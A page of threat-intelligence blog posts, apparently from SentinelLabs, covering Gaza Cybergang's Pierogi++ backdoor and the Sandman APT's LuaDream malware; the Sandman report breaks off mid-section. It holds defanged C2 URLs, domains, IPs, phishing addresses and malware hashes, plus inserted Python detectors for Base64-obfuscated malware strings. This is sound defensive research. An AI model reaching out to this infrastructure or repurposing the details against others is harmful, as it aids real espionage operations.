http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE C2 URL (Office document)
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6 C2 URL (Office document)
http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP C2 URL (HWP document)

IP Addresses

Value Note
84.32.129[.]32 Cherry Servers VPS
84.32.131[.]104 Cherry Servers VPS
84.32.131[.]30 Cherry Servers VPS
84.32.131[.]50 Cherry Servers VPS
84.32.131[.]59 Cherry Servers VPS
84.32.131[.]66 Cherry Servers VPS
84.32.131[.]87 Cherry Servers VPS

Email Addresses

Value Note
c039911[@]daum.net Phishing email address
kirnchi122[@]hanmail.net Phishing email address

Gaza Cybergang | Unified Front Targeting Hamas Opposition

14 December 2023 at 13:55

Executive Summary

  • Overlaps in targeting, malware characteristics, and long-term malware evolutions post 2018 suggest that the Gaza Cybergang sub-groups have likely been consolidating, possibly involving the establishment of internal and/or external malware supply lines.
  • Gaza Cybergang has upgraded its malware arsenal with a backdoor that we track as Pierogi++, first used in 2022 and seen throughout 2023.
  • Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war.
  • SentinelLabsโ€™ analysis reinforces the suspected ties between Gaza Cybergang and WIRTE, historically considered a distinct cluster with loose relations to the Gaza Cybergang.

Overview

Active since at least 2012, Gaza Cybergang is a suspected Hamas-aligned cluster whose operations are primarily targeting Palestinian entities and Israel, focusing on intelligence collection and espionage. Being a threat actor of interest in the context of the Israel-Hamas war, we track Gaza Cybergang as a group composed of several adjacent sub-groups observed to share victims, TTPs, and use related malware strains since 2018. These include Gaza Cybergang Group 1 (Molerats), Gaza Cybergang Group 2 (Arid Viper, Desert Falcons, APT-C-23), and Gaza Cybergang Group 3 (the group behind Operation Parliament).

The goal of this post is twofold:

  • To highlight relations between recent and historical operations, providing a new common context connecting the Gaza Cybergang sub-groups.
  • To provide recent findings and previously unreported IOCs, which add to the accumulated knowledge of the group and support further collective tracking of Gaza Cybergang activities.

In the midst of Gaza Cybergang activity spanning from late 2022 until late 2023, we observed that the group introduced a new backdoor to their malware arsenal used in targeting primarily Palestinian entities. We track this backdoor as Pierogi++. We assess that Pierogi++ is based on an older malware strain named Pierogi, first observed in 2019. We also observed consistent targeting of Palestinian entities in this time period using the groupโ€™s staple Micropsia family malware and Pierogi++.

This targeting is typical for Gaza Cybergang. These activities are likely aligned with the tensions between the Hamas and Fatah factions, whose reconciliation attempts had been stagnating before and after the outbreak of the Israelโ€“Hamas war. At the time of writing, our visibility into Gaza Cybergangโ€™s activities after the onset of the conflict does not point to significant changes in their intensity or characteristics.

Our analysis of recent and historical malware used in Gaza Cybergang operations highlights new relations between activities that have taken place years apart – the Big Bang campaign (2018) and Operation Bearded Barbie (2022). Further, technical indicators we observed, originating from a recently reported activity, reinforce a suspected relation between Gaza Cybergang and the lesser-known threat group WIRTE. This group has historically been considered a distinct cluster and was later associated with low confidence with the Gaza Cybergang. This demonstrates the intertwined nature of the Gaza Cybergang cluster, making accurate delineation between its constituent sub-groups, and even between them and other suspected Middle Eastern groups, challenging.

Throughout our analysis of Gaza Cybergang activities spanning from 2018 until the present date, we observed consistent malware evolution over relatively long time periods. This ranges from minor changes in the obfuscation techniques used, to adopting new development paradigms, and resurfacing old malware strains in the form of new ones (as Pierogi++ demonstrates). In addition, the observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggest that the group has likely been undergoing a consolidation process. This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors.

Micropsia and Pierogi++ Target Hamas Opposition

The Gaza Cybergang umbrella has continuously targeted Israeli and Palestinian entities preceding the Israel-Hamas war. We observed additional activities spanning from late 2021 to late 2023 aligned with previous research. Our visibility into these activities, and the theme and language of the used lure and decoy documents, indicate that they were primarily targeting Palestinian entities. The majority involved malware variants of the staple Micropsia family.

Among the Micropsia family malware, we observed its Delphi and Python-based variants deploying decoy documents written in Arabic and focussing on Palestinian matters, such as the Palestinian cultural heritage and political events. Many of the associated C2 domain names, such as bruce-ess[.]com and wayne-lashley[.]com, reference public figures, which aligns with the known domain naming conventions of the group. To support further collective tracking of Gaza Cybergang activities, we focus at the end of the report on listing previously unreported Micropsia indicators.

Decoy document

Among the Micropsia activities we identified a backdoor that we assess is based on a malware first reported in 2020 and named Pierogi. This backdoor, which we labeled Pierogi++, is implemented in C++, and we observed its use in 2022 and over 2023. The malware is typically delivered through archive files or weaponized Office documents on Palestinian matters, written in English or Arabic.


Malicious documents distributing Pierogi++

The documents distributing Pierogi++ use macros to deploy the malware, which then typically masquerades as a Windows artifact, such as a scheduled task or a utility application. The malware implementation is embedded either in the macros or in the documents themselves, often in Base64-encoded form.
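A macro that carries its payload as a Base64 string literal leaves a recognisable trace in the VBA source, so the literals can be decoded and classified before the document is ever opened. The scanner below is an added example written for this post, not the group's macro: it extracts Base64 literals from VBA text, strictly decodes them, and labels each as text, a PE image (MZ header) or opaque binary. The macro fragment it scans is constructed; the marker literal is the Tm9BVg== string the report shows decoding to NoAV, the blob only begins with an MZ header and is not executable, and the minimum literal length of 8 is an assumption.

```python
import base64
import binascii
import re
import string

# Base64 runs inside VBA string literals; 8 is the assumed minimum so short markers such as Tm9BVg== are caught
B64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/=]{8,})"')
PRINTABLE = set(string.printable.encode())


def decode_candidate(candidate: str):
    """Strict decode: reject non-alphabet characters and lengths that are not a multiple of four."""
    if len(candidate) % 4:
        return None
    try:
        return base64.b64decode(candidate, validate=True)
    except binascii.Error:
        return None


def classify_payload(data: bytes) -> str:
    if data.startswith(b"MZ"):
        return "pe"
    if all(b in PRINTABLE for b in data):
        return "text"
    return "binary"


def scan_macro_source(vba: str) -> list:
    """One finding per decodable Base64 literal: where it was, what it decodes to, and a short preview."""
    findings = []
    for m in B64_LITERAL_RE.finditer(vba):
        decoded = decode_candidate(m.group(1))
        if decoded is None:
            continue
        kind = classify_payload(decoded)
        preview = decoded[:16].decode("ascii", "replace") if kind == "text" else decoded[:4].hex()
        findings.append({"offset": m.start(1), "length": len(m.group(1)), "kind": kind, "preview": preview})
    return findings


def build_sample_macro() -> str:
    """Constructed VBA fragment: the NoAV marker literal and a blob that merely starts with an MZ header."""
    fake_pe = base64.b64encode(b"MZ\x90\x00" + b"CONSTRUCTED FAKE PE BODY, NOT EXECUTABLE").decode()
    return (
        "Sub AutoOpen()\n"
        "    Dim marker As String\n"
        '    marker = "Tm9BVg=="\n'
        "    Dim blob As String\n"
        f'    blob = "{fake_pe}"\n'
        "    Dim path As String\n"
        '    path = "C:\\Users\\Public\\taskhost.exe"\n'
        "End Sub\n"
    )


if __name__ == "__main__":
    for finding in scan_macro_source(build_sample_macro()):
        print(finding)
```

On a real document, feed the output of a VBA extractor (olevba from oletools, for instance) into `scan_macro_source`; a literal that decodes to an MZ header is the embedded executable the text describes, while short text hits such as NoAV are the status strings worth turning into detection content.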

Office macro deploying Pierogi++

Pierogi++ executables also masquerade as politically-themed documents, with names such as “The national role of the revolutionary and national councils in confronting the plans for liquidation and Judaization”, “The situation of Palestinian refugees in Syria refugees in Syria”, and “The Ministry of State for Wall and Settlement Affairs established by the Palestinian government”.

We assess that Pierogi++ is based on the Pierogi backdoor, whose variants are implemented in Delphi and Pascal. Pierogi and Pierogi++ share similarities in code and functionalities, such as strings, reconnaissance techniques, and deployment of decoy documents, some also seen in Micropsia malware.

String indicating that no anti-virus solution has been detected: Pierogi++ (Tm9BVg== decodes to NoAV)

String indicating that no anti-virus solution has been detected: Micropsia

Further, Pierogi++ samples implement in the same order the same backdoor functionalities as Pierogi: taking screenshots, command execution, and downloading attacker-provided files.

When handling backdoor commands, some Pierogi++ samples use the strings download and screen, whereas earlier Pierogi samples have used the Ukrainian strings vydalyty, Zavantazhyty, and Ekspertyza. This raised suspicions at the time of potential external involvement in Pierogi’s development. We have not observed indicators pointing to such involvement in the Pierogi++ samples we analyzed.

Pierogi++ backdoor strings

Most of the Pierogi++ C2 servers are registered at Namecheap and hosted by Stark Industries Solutions LTD, aligning with previous infrastructure management practices of the Gaza Cybergang umbrella. The backdoor uses the curl library for exchanging data with the C2 server, a technique that we do not often observe in Gaza Cybergangโ€™s malware arsenal.

Use of the curl library

Pierogi++ represents a compelling illustration of the continuous investment in maintenance and innovation of Gaza Cybergangโ€™s malware, likely in an attempt to enhance its capabilities and evade detection based on known malware characteristics.

From Molerats to Arid Viper And Beyond

Following the first report on the Pierogi backdoor in February 2020, late 2020 and 2021 mark the association of the backdoor and its infrastructure with Arid Viper. The Micropsia activity linked to Arid Viper, which led to the discovery of the then-new PyMicropsia malware in December 2020, includes Pierogi samples. Further historical Pierogi samples use the escanor[.]live and nicoledotso[.]icu domains for C2 purposes, which have been associated with Arid Viper in December 2020 and April 2021. The latest variant of Pierogi is Pierogi++, which we observed targeting Palestinian entities in 2022 and over 2023 โ€“ this targeting is typical for Arid Viper.

Our investigations into malware used by Gaza Cybergang prior to 2022, which share capabilities, structure, and infrastructure with Pierogi, resulted in a multitude of samples implemented in Delphi, Pascal, and C++. This highlights the frequent adoption of different development paradigms by Gaza Cybergang and aligns with the observations by Facebook, which associates these variants with Arid Viper and tracks them using different names under the broader Micropsia malware family, such as Glasswire, Primewire, and fgref.

Malware attributions

In late 2020, victims targeted with Pierogi variants as part of a suspected Arid Viper operation were observed to also be infected with the then-new SharpStage and DropBook malware, an overlap assessed to strengthen the ties between the Molerats and Arid Viper sub-groups of Gaza Cybergang.

Later, in June 2021, the LastConn malware, which was discovered as part of activities attributed to the TA402 cluster, was assessed with high confidence to be an updated version of SharpStage.

Based on our follow-up investigation into recent 2023 TA402 activity targeting Middle Eastern government entities, we highlight concrete overlaps in malware used by TA402 and a lesser-known threat actor named WIRTE. First disclosed in April 2019, WIRTE was initially considered to be a distinct cluster but was later associated with low confidence to the Gaza Cybergang umbrella (primarily based on the use of decoys on Palestinian matters, which are typical for the Gaza Cybergang constituent sub-groups).

WIRTE is known for using a unique custom user agent for C2 communication when staging malware, with the value of the rv field likely being an intrusion identifier. WIRTEโ€™s stagers encapsulate C2 communication attempts in an infinite loop, separated by sleep periods of randomly generated lengths within defined lower and upper boundaries. We observe the same unique user agent format and C2 communication pattern in TA402โ€™s .NET malware stagers.

User agent and C2 communication in 2020 WIRTE malware

User agent and C2 communication in 2022 TA402 malware

The involvement of malware artifacts previously seen only in the context of WIRTE indicates a likely relation between the TA402, WIRTE, and Gaza Cybergang clusters. This aligns with the latest TA402 attribution assessment as a cluster overlapping with Gaza Cybergang and WIRTE.

Back To The Big Bang

Operation Bearded Barbie, revealed in April 2022 and attributed with moderate-high confidence to Arid Viper, is a campaign that has been targeting Israeli individuals and officials in the law enforcement, military, and emergency services sectors. The operation highlights the BarbWire backdoor as a novel malware in Arid Viperโ€™s arsenal.

A closer look at the implementation of the BarbWire variants observed as part of Operation Bearded Barbie reveals relations to a malware strain used in the 2018 Big Bang campaign, itself considered an evolution of a 2017 campaign targeting Palestinian individuals and entities. Without making a concrete attribution at the time, the campaign was loosely associated with the Gaza Cybergang, noting some links to Arid Viper in particular.

The Big Bang campaign involves the use of a C++ implant, assessed to be an upgraded version of older Micropsia variants. In addition to some similarities in execution flow and structure, we observed that the backdoors used in the Big Bang and Bearded Barbie campaigns share unique strings that report the execution status and/or indicate internal references to malware modules.

The BarbWire samples used in Operation Bearded Barbie were reported to implement a custom Base64 algorithm to obfuscate strings. The backdoor does not change the Base64 encoding algorithm itself; it modifies Base64 strings by inserting an extra character that is removed before decoding. Decoding BarbWire strings in this way reveals exact matches between BarbWire and the backdoor observed in the Big Bang campaign.

Backdoor string matches

In contrast to BarbWire, Big Bang backdoor samples obfuscate the same strings using plain Base64 encoding. The malware authors likely introduced the Base64 string modification in later development efforts (reflected in Operation Bearded Barbie) as a relatively simple but effective attempt to evade detection based on known string artifacts.

This technique also allows the modified Base64 strings to be changed quickly, by altering only the inserted second character, to keep evading detection over time. For example, both IZERvZXMgbm90IGV4aXN0Lg and IHERvZXMgbm90IGV4aXN0Lg Base64-decode to “ Does not exist.” once the second character is removed.
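
As an added illustration (Python written for this page, not code from the report, from BarbWire, or from the Big Bang backdoor), the following decodes the modified strings and builds a pattern that keeps matching when the operator rotates the inserted character. The two sample strings are the ones quoted above; the "strings output" is constructed.

```python
import base64
import re

# The two modified strings quoted in the text: one character inserted at index 1
# of the plain Base64 string, with the trailing "==" padding dropped.
SAMPLES = ["IZERvZXMgbm90IGV4aXN0Lg", "IHERvZXMgbm90IGV4aXN0Lg"]

# Constructed sample of a strings dump: one plain (Big Bang style) and one
# modified (BarbWire style) encoding of the same text among unrelated lines.
SAMPLE_STRINGS = "kernel32.dll\nIERvZXMgbm90IGV4aXN0Lg\nIHERvZXMgbm90IGV4aXN0Lg\nGetProcAddress\n"

B64_CHAR = r"[A-Za-z0-9+/]"


def _pad(s: str) -> str:
    """Restore the '=' padding the samples drop."""
    return s + "=" * (-len(s) % 4)


def decode_barbwire(s: str, skip_index: int = 1) -> str:
    """Remove the inserted character at skip_index, then plain Base64-decode."""
    stripped = s[:skip_index] + s[skip_index + 1:]
    return base64.b64decode(_pad(stripped), validate=True).decode("utf-8")


def decode_plain(s: str) -> str:
    """Plain Base64 (the Big Bang variant), padding restored."""
    return base64.b64decode(_pad(s), validate=True).decode("utf-8")


def variant_regex(plaintext: str, skip_index: int = 1) -> "re.Pattern[str]":
    """Pattern matching the plain encoding of plaintext and every encoding with
    one Base64 character inserted at skip_index, so a rule survives rotation
    of the inserted character. Padding is intentionally not required."""
    enc = base64.b64encode(plaintext.encode("utf-8")).decode().rstrip("=")
    head, tail = re.escape(enc[:skip_index]), re.escape(enc[skip_index:])
    return re.compile(rf"{head}{B64_CHAR}?{tail}")


def scan(text: str, plaintexts):
    """Return the known plaintexts that appear in text in either encoding."""
    return [p for p in plaintexts if variant_regex(p).search(text)]


if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", repr(decode_barbwire(s)))
    print(scan(SAMPLE_STRINGS, [" Does not exist."]))
```

If a later build moves the insertion to a different offset, only skip_index changes; the pattern otherwise stays tied to the known plaintext rather than to any one encoded string.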

Conclusions

Gaza Cybergang operations over 2022 and 2023 reveal a sustained focus on targeting Palestinian entities. The discovery of the Pierogi++ backdoor shows that the group continues to evolve and supplement its staple malware arsenal, including transforming older implementations into new tooling.

The intertwined nature of its constituent sub-groups sharing TTPs, malware, and victims, indicates that Gaza Cybergang is a unified front against anti-Hamas interests. The persistent nature of the Gaza Cybergang threat underscores the necessity for sustained vigilance and cooperative measures to address the challenges posed by these threat actors.

SentinelLabs continues to monitor Gaza Cybergang activities to further improve the collective knowledge on the groupโ€™s dynamics and to supply indicators, which are relevant to security teams defending their organizations and individuals at risk of being targeted.

Indicators of Compromise

SHA-1 Hashes

003bb055758a7d687f12b65fc802bac07368335e Micropsia family malware
19026b6eb5c1c272d33bda3eab8197bec692abab Micropsia family malware
20c10d0eff2ef68b637e22472f14d87a40c3c0bd Pierogi backdoor
26fe41799f66f51247095115f9f1ff5dcc56baf8 TA402 malware staging executable (2022 version)
278565e899cb48138cc0bbc482beee39e4247a5d Pierogi backdoor
2a45843cab0241cce3541781e4e19428dcf9d949 Micropsia family malware
32d0073b8297cc8350969fd4b844d80620e2273a Document distributing Pierogi++
3ae41f7a84ca750a774f777766ccf4fd38f7725a Document distributing Pierogi++
42cb16fc35cfc30995e5c6a63e32e2f9522c2a77 Pierogi++
4dcdb7095da34b3cef73ad721d27002c5f65f47b BarbWire backdoor
5128d0af7d700241f227dd3f546b4af0ee420bbc Pierogi++
5619e476392c195ba318a5ff20e40212528729ba Micropsia family malware
599cf23db2f4d3aa3e19d28c40b3605772582cae Pierogi backdoor
5e46151df994b7b71f58556c84eeb90de0776609 Document distributing Pierogi++
5fcc262197fe8e0f129acab79fd28d32b30021d7 WIRTE PowerShell script
60480323f0e6efa3ec08282650106820b1f35d2f Archive distributing Pierogi++
694fa6436302d55c544cfb4bc9f853d3b29888ef BarbWire backdoor
708f05d39df7e47aefc4b15cb2db9f26bc9fad5f TA402 malware staging executable (2022 version)
745657b4902a451c72b4aab6cf00d05895bbc02f Micropsia family malware
75a63321938463b8416d500b34a73ce543a9d54d Pierogi++
95fc3fb692874f7415203a819543b1e0dd495a57 Micropsia family malware
994ebbe444183e0d67b13f91d75b0f9bcfb011db Operation Big Bang backdoor
aeeeee47becaa646789c5ee6df2a6e18f1d25228 Pierogi++
c3038d7b01813b365fd9c5fd98cd67053ed22371 Micropsia family malware
da96a8c04edf8c39d9f9a98381d0d549d1a887e8 Pierogi++
ee899ae5de50fdee657e04ccd65d76da7ede7c6f Operation Big Bang backdoor
f3e99ec389e6108e8fda6896fa28a4d7237995be Pierogi++

Domains

aracaravan[.]com Pierogi++ C2 server
beatricewarner[.]com Pierogi++ C2 server
bruce-ess[.]com Micropsia C2 server
claire-conway[.]com Micropsia C2 server
delooyp[.]com Micropsia C2 server
escanor[.]live Pierogi backdoor C2 server
izocraft[.]com Micropsia C2 server
jane-chapman[.]com Micropsia C2 server
lindamullins[.]info Operation Big Bang backdoor C2 server
nicoledotson[.]icu Pierogi backdoor C2 server
overingtonray[.]info Pierogi backdoor C2 server
porthopeminorhockey[.]net Micropsia C2 server
spgbotup[.]club Operation Big Bang backdoor C2 server
stgeorgebankers[.]com WIRTE C2 server
swsan-lina-soso[.]info Pierogi++ C2 server
theconomics[.]net TA402 C2 server
wanda-bell[.]website BarbWire C2 server
wayne-lashley[.]com Micropsia C2 server
zakaria-chotzen[.]info Pierogi++ C2 server

Sandman APT | China-Based Adversaries Embrace Lua

11 December 2023 at 13:55

By Aleksandar Milenkoski, Bendik Hagen (PwC), and Microsoft Threat Intelligence

Executive Summary

  • The Sandman APT is likely associated with suspected China-based threat clusters known to use the KEYPLUG backdoor, in particular a cluster jointly presented by PwC and Microsoft at Labscon 2023 โ€“ STORM-0866/Red Dev 40.
  • The Sandmanโ€™s Lua-based malware LuaDream and the KEYPLUG backdoor were observed co-existing in the same victim environments.
  • Sandman and STORM-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions.
  • The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators.
  • The use of the Lua development paradigm in the cyberespionage domain, historically associated with actors considered Western or Western-aligned, is likely being adopted by a broader range of adversaries, including those with ties to China.

Overview

In this report, SentinelLabs, Microsoft, and PwC threat intelligence researchers provide attribution-relevant information on the Sandman APT cluster positioning this threat on the broader threat landscape. We highlight links between Sandman and a suspected China-based threat actor using the shared KEYPLUG backdoor โ€“ STORM-0866/Red Dev 40. This includes victimology overlaps, cohabitation, and sharing C2 infrastructure control and management practices.

STORM-0866/Red Dev 40 is a developing APT threat cluster primarily targeting entities in the Middle East and the South Asian subcontinent, including telecommunication providers and government entities. These are regions and sectors where we also observed Sandman activity. The modular backdoor KEYPLUG is a staple in STORM-0866/Red Dev 40โ€™s arsenal. Mandiant first reported on KEYPLUG as part of intrusions into U.S. government entities by the Chinese APT group APT41.

Microsoft and PwC have subsequently identified at least three other developing clusters involving KEYPLUG, including STORM-0866/Red Dev 40. Their research, making the case that KEYPLUG is likely shared among multiple suspected China-based groups, was presented at LabsCon 2023. They distinguish STORM-0866/Red Dev 40 from the other clusters based on specific malware characteristics, such as unique encryption keys for KEYPLUG C2 communication, and a higher degree of operational security, such as relying on Cloud-based reverse proxy infrastructure to hide the true hosting locations of their C2 servers.

SentinelLabs and Microsoft have observed Sandman’s LuaDream and KEYPLUG implants cohabiting in the same victim environments, in some cases on the same endpoints. LuaDream is a maintained modular backdoor based on LuaJIT, with version 11.0.2.1.23.1 observed in March 2023 and version 12.0.2.5.23.29 observed in August 2023. In one instance, the KEYPLUG malware had been deployed approximately 3 months prior to LuaDream (in May 2023). LuaDream and KEYPLUG were active at the same time for approximately 2 weeks until both threats were remediated. During this period, we did not observe any contestation or deconfliction activities by the LuaDream or KEYPLUG operators.

A close examination of the implementation and C2 infrastructure of these distinct malware strains revealed indicators of shared development as well as infrastructure control and management practices, and some overlaps in functionalities and design, suggesting shared functional requirements by their operators.

The findings we present are yet another showcase of the complex nature of the China-based threat landscape. As exemplified by Sandman and STORM-0866/Red Dev 40, this landscape is marked by substantial cooperation and coordination among its constituent threat groups, along with the possibility of third-party vendors supplying the operational teams with tooling. This makes accurate clustering challenging. Therefore, while acknowledging the association of Sandman with the suspected China-based adversaries using KEYPLUG, we continue to track Sandman as a distinct cluster until further conclusive information suggesting otherwise becomes available.

Lua-based modular backdoors, such as LuaDream, have been observed relatively rarely and often in the context of espionage-motivated APTs historically considered Western or Western-aligned. Our findings on Sandman indicate that the Lua development paradigm is being adopted by a broader set of cyberespionage threat actors for the modularity, portability, and simplicity that the Lua scripting language offers.

Sandman and STORM-0866/Red Dev 40 Infrastructure

The SSL certificate assigned to the LuaDream C2 domain ssl.explorecell[.]com has also been used on the servers with IPs of 185.51.134[.]27 (between March and April 2023) and 45.80.148[.]151 (in March 2023). 185.51.134[.]27 is allocated to the Estonian VPS service provider EstNOC and 45.80.148[.]151 to the Romanian provider HOSTGW SRL. ssl.explorecell[.]com last resolved to 185.82.218[.]230, an IP address of a server hosted in Bulgaria by the ITLDC hosting provider.

  • Thumbprint: fc8fdf58cd945619cbfede40ba06aada10de9459
  • Serial number: 364670096077097330220756280372394037039639
  • Common Name: ssl.explorecell[.]com

Approximately 4 months later (in August 2023), the server at 185.51.134[.]27 used an SSL certificate issued for the domain dan.det-ploshadka[.]com. This domain last resolved to 79.110.52[.]160, a server hosted by the Romanian service provider M247.

  • Thumbprint: a7932112b7880c95d77bc36c6fcced977f4a5889
  • Serial number: 365025056055127017786055050446086862849019
  • Common Name: dan.det-ploshadka[.]com

Microsoft and PwC have observed dan.det-ploshadka[.]com being used as a KEYPLUG C2 server and attribute the domain with high confidence to STORM-0866/Red Dev 40. This assessment is primarily based on the use of RC4 keys for encrypting C2 data that are unique to STORM-0866/Red Dev 40, as well as on the use of known STORM-0866/Red Dev 40 malware in the intrusions.

The dan.det-ploshadka[.]com certificate has also been used on the servers with IPs 45.90.59[.]17 (between July and September 2023), 45.129.199[.]122 (in September 2023), and 146.70.157[.]20 (in June 2023).

Another certificate, issued for the domain ssl.e-novauto[.]com, was also used on 146.70.157[.]20 in May 2023. ssl.e-novauto[.]com, which has an overlap in subdomain naming convention with the ssl.explorecell[.]com Sandman domain, last resolved to 172.67.216[.]63 (an IP address of a Cloud-based reverse proxy infrastructure). 146.70.157[.]20 is allocated to the Romanian hosting service provider M247.

  • Thumbprint: b6d759c9ea5d2136bacb1b2289a31c33500c8de8
  • Serial number: 59961237898726280462746217792430024401815283068
  • Common Name: ssl.e-novauto[.]com

Like dan.det-ploshadka[.]com, the ssl.e-novauto[.]com domain has been observed by Microsoft and PwC in use as a KEYPLUG C2 server and is attributed with high confidence to STORM-0866/Red Dev 40.

Among the other server IPs on which the ssl.e-novauto[.]com certificate was used (5.255.88[.]188 in October 2022; 5.2.67[.]176 between March and May 2023; 5.2.72[.]130 in April 2022; 37.120.140[.]205 between March 2022 and May 2023; and 185.38.142[.]129 between October 2022 and January 2023), 5.2.67[.]176 has been the resolving IP for the ssl.articella[.]com domain since January 2023. This domain has an overlap in naming convention with the ssl.e-novauto[.]com STORM-0866/Red Dev 40 domain and the ssl.explorecell[.]com Sandman domain.

Infrastructure overview

PwC tracks STORM-0866/Red Dev 40 as a distinct cluster from the other threat groups using the KEYPLUG malware based on their frequent use of Cloud-based reverse proxy infrastructure, likely as an operational security measure to avoid exposing the true hosting locations. We observed this in the context of Sandman as well, noting a shift from using a directly exposed C2 server IP address (C2 domain: ssl.explorecell[.]com) to the address of a reverse proxy infrastructure (C2 domain: mode.encagil[.]com).

The overlap of unique infrastructure control and management practices, hosting provider selections, and domain naming conventions, indicates a likely relation between the Sandman and the STORM-0866/Red Dev 40 APT clusters from an infrastructure perspective.
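
The pivots in this section (certificate seen on an IP, certificate issued for a domain, domain resolving to an IP) can be expressed as a breadth-first search over a graph of those three node types. The following is an added example in Python, not code or tooling from the report. The edge list transcribes the observations above, with thumbprints abbreviated to their first 8 hex digits, plus one constructed domain (unrelated.invalid) placed behind the reverse-proxy address to show why shared infrastructure must not be used as a pivot node.

```python
from collections import deque

# Edge list transcribed from this section. Node prefixes: cert:, ip:, domain:.
OBSERVED = [
    ("cert:fc8fdf58", "domain:ssl.explorecell[.]com"),
    ("cert:fc8fdf58", "ip:185.51.134[.]27"),
    ("cert:fc8fdf58", "ip:45.80.148[.]151"),
    ("domain:ssl.explorecell[.]com", "ip:185.82.218[.]230"),
    ("cert:a7932112", "domain:dan.det-ploshadka[.]com"),
    ("cert:a7932112", "ip:185.51.134[.]27"),
    ("cert:a7932112", "ip:45.90.59[.]17"),
    ("cert:a7932112", "ip:45.129.199[.]122"),
    ("cert:a7932112", "ip:146.70.157[.]20"),
    ("domain:dan.det-ploshadka[.]com", "ip:79.110.52[.]160"),
    ("cert:b6d759c9", "domain:ssl.e-novauto[.]com"),
    ("cert:b6d759c9", "ip:146.70.157[.]20"),
    ("cert:b6d759c9", "ip:5.255.88[.]188"),
    ("cert:b6d759c9", "ip:5.2.67[.]176"),
    ("cert:b6d759c9", "ip:5.2.72[.]130"),
    ("cert:b6d759c9", "ip:37.120.140[.]205"),
    ("cert:b6d759c9", "ip:185.38.142[.]129"),
    ("domain:ssl.e-novauto[.]com", "ip:172.67.216[.]63"),
    ("domain:ssl.articella[.]com", "ip:5.2.67[.]176"),
    # Constructed, not from the report: an unrelated site behind the same
    # reverse-proxy address, to demonstrate the false-link problem.
    ("domain:unrelated.invalid", "ip:172.67.216[.]63"),
]

# The text identifies 172.67.216[.]63 as a reverse-proxy address. Any number of
# unrelated sites can sit behind it, so it is excluded as a pivot node.
NO_PIVOT = {"ip:172.67.216[.]63"}


def build_graph(edges):
    graph = {}
    for a, b in edges:
        graph.setdefault(a, set()).add(b)
        graph.setdefault(b, set()).add(a)
    return graph


def pivot(seed, edges, blocked=frozenset()):
    """Breadth-first search from seed across shared certificates and IPs.
    Returns {domain: shortest hop path} for every other domain reached;
    blocked nodes are never entered, so nothing is linked through them."""
    graph = build_graph(edges)
    paths = {seed: [seed]}
    queue = deque([seed])
    while queue:
        node = queue.popleft()
        for nxt in sorted(graph.get(node, ())):
            if nxt in paths or nxt in blocked:
                continue
            paths[nxt] = paths[node] + [nxt]
            queue.append(nxt)
    return {n: p for n, p in paths.items() if n.startswith("domain:") and n != seed}


def linked_domains(seed="domain:ssl.explorecell[.]com"):
    return pivot(seed, OBSERVED, NO_PIVOT)


if __name__ == "__main__":
    for domain, path in linked_domains().items():
        print(domain, " <- ".join(reversed(path)))
```

The returned path records the evidence for each link (which certificate, which server), which is what an attribution write-up needs to show; rerunning without NO_PIVOT demonstrates how a single shared proxy address would pull the constructed unrelated domain into the cluster.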

LuaDream and KEYPLUG

LuaDream and KEYPLUG are distinct malware strains. KEYPLUG is implemented in C++, whereas the majority of the LuaDream functionalities are implemented in Lua. The samples that we analyzed do not share straightforward indicators that would confidently classify them as closely related or originating from the same source, such as use of identical encryption keys or direct overlaps in implementation. However, we observed indicators of shared development practices and some overlaps in functionalities and design, suggesting shared functional requirements by the operators. This is not uncommon in the Chinese malware landscape.

We also observed a code comment in Chinese in the main_proto_WinHttpServer component of LuaDream version 11.0.2.1.23.1, indicating potential Chinese origin. However, we note that all other LuaDream string artifacts (function and variable names, and code comment, status, and error reporting strings) are formulated in English.

Code comment in LuaDream (translates from Chinese to “returned handle”)

LuaDream is likely still in active development. It remains to be seen whether further iterations of the malware and its plugins will share implementation overlaps, functionality or design patterns with KEYPLUG or other malware strains of suspected Chinese origin.

C2 Protocols

LuaDream and KEYPLUG are highly modular and multi-protocol in design, both implementing support for the HTTP, TCP, WebSocket, and QUIC protocols for C2 communication. The combination of QUIC and WebSocket is a relatively rare backdoor feature and its implementation in both LuaDream and KEYPLUG may be the result of a shared functional requirement by the backdoorsโ€™ operators.

LuaDream and KEYPLUG evaluate the configured protocol in the same order: HTTP, then TCP, WebSocket, and QUIC. The LuaDream keyword HTTPS2 refers to WebSocket, and KEYPLUG implements additional support for UDP. We do not exclude the possibility that future versions of LuaDream will support UDP as well.

LuaDream: Protocol handling

KEYPLUG: Protocol handling

For each protocol, both LuaDream and KEYPLUG implement internal structures that store client data, such as the handles to the established sockets to the C2 servers.

Execution Flow and C2 Data Management

The high-level execution flows of LuaDream and KEYPLUG are very similar. Both backdoors first gather and exfiltrate system and user information in designated functions, with overlaps in gathered information (for example, MAC address, OS version, IP address, computer name, and username).

LuaDream and KEYPLUG then instantiate threads designated for sending and receiving C2 data, establish connection to the C2 server, and continue to process backdoor commands and manage plugins. Plugin management includes loading and unloading plugins.

The backdoors use global data buffers designated for storing data to be sent to the C2 server, and data received from the server. LuaDream and KEYPLUG read from the global buffers that store incoming C2 data and continue processing it when available.

LuaDream and KEYPLUG store in designated internal structures overlapping information about the global buffers, such as starting memory addresses, sizes, and pointers to Windows CRITICAL_SECTION structures. LuaDream defines this structure as _MEM_DATA_CACHE_.

LuaDream: Global buffer structure (decompiled LuaJIT bytecode)

